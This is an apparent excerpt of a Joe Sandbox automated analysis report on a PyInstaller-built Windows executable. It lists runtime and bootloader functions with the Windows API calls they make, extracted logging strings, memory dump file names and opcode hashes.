                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                • Opcode ID: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                                                • Instruction ID: 7dc81da169eb9ac851014650f5b1cc61df75a0104caa78d31afb9d54caf82f7c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D12532B08A4099E760DF75D4502FC77B5FB44798B848239CE6EA7B99DE38E406D710
                                                                                                                                                                                                                                                                                Function 00007FF7333B6D8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                • Opcode ID: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                                                • Instruction ID: 2232715cb1c020b6f6d085597032b2ae6b011e721407c57f8c6987fa0084c3f9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6410812A0878262FFB4AB25D501379F660EF90BA4F94823DEE5D16AE6DF3CD441D710
                                                                                                                                                                                                                                                                                Function 00007FF7333A9F50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333A9F82
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73339C165), ref: 00007FF7333A9FA0
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                                • API String ID: 3580290477-1027480231
                                                                                                                                                                                                                                                                                • Opcode ID: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                                                • Instruction ID: 3bab877417839804e7688edacc9df31cd2164b25a972c13a783afccb36e33fc6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C418332A08752A5EBA4FF25A4500B8F7A4EF447C4F84C039E95E67B55DF3DD481A320
                                                                                                                                                                                                                                                                                Function 00007FF7333ADB38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                • Opcode ID: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                                                • Instruction ID: f58d8d39c77a82c8bcb79a573bc11b302f8a6c7802632700d6c12848aaa67f72
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E141D462B18A8191DB60AF25E4543BAB7A0FB88784FC08035EE4D97798DF7CD401D710
                                                                                                                                                                                                                                                                                Function 00007FF733392020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF733391B4A), ref: 00007FF733392070
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: %s: %s$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3704582800
                                                                                                                                                                                                                                                                                • Opcode ID: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                                                • Instruction ID: a8be8069a355d3c93cf2b0f9f5aac892b8ebcc7eea59d909922e8e2fee14ea85
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59210722B18681A5E6B0B761BC016F6E294BF88BD4F818139FE8D73789DE3CD156D610
                                                                                                                                                                                                                                                                                Function 00007FF7333B0828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                • Opcode ID: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                                                • Instruction ID: 9ae4bdffe056404fc861201b2d785faf7e12b2663c518d258af1486f04f3b44f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C621D232A0C28191FBB0AB11D4442ADB3B1FB88B44FC5C039D68D63685DF7CEA45D7A1
                                                                                                                                                                                                                                                                                Function 00007FF733392140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7333928DA,FFFFFFFF,00000000,00007FF73339336A), ref: 00007FF73339218E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: WARNING$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3752221249
                                                                                                                                                                                                                                                                                • Opcode ID: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                                                • Instruction ID: 3f4afbd01b073fad2a2928054ce5fa36c076971e83d4c87eaaa6cb559c7f578f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811C332A18B81A1E6B0AB51F8816EAB364FF847C4F808039FA8D63B59DE7CD1559710
                                                                                                                                                                                                                                                                                Function 00007FF733391E50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF733391B79), ref: 00007FF733391E9E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: ERROR$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3005936843
                                                                                                                                                                                                                                                                                • Opcode ID: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
                                                                                                                                                                                                                                                                                • Instruction ID: 3e3e43a4ab72f4903d8cae129b8b4ece2c2dfc5f06f64a0499d5c5e8f075b31f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F11A532B18B81A1E670AB51F4816EAF364FF847C4F808139FA8D63B59DE7CD1559710
                                                                                                                                                                                                                                                                                Function 00007FF73339F2D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                • Opcode ID: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
                                                                                                                                                                                                                                                                                • Instruction ID: 5aff93fadc68300c4de4dbdcb0ec3c5c9a8165c83d09c908dbc8007cc5053091
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54113032618B8192EB619F15F440269B7E4FB88B84F988234DECD17754DF3CD551D710
                                                                                                                                                                                                                                                                                Function 00007FF7333B19AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                • Opcode ID: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
                                                                                                                                                                                                                                                                                • Instruction ID: c4d1e68bcdd96ff4512cf19090d486b01d004abdfb7e055e40fdde83a88369e3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC018422D1C246A5F7B0BF60D4612BEB3A0EF44704FC0903DD55E62695DF3CE504AB24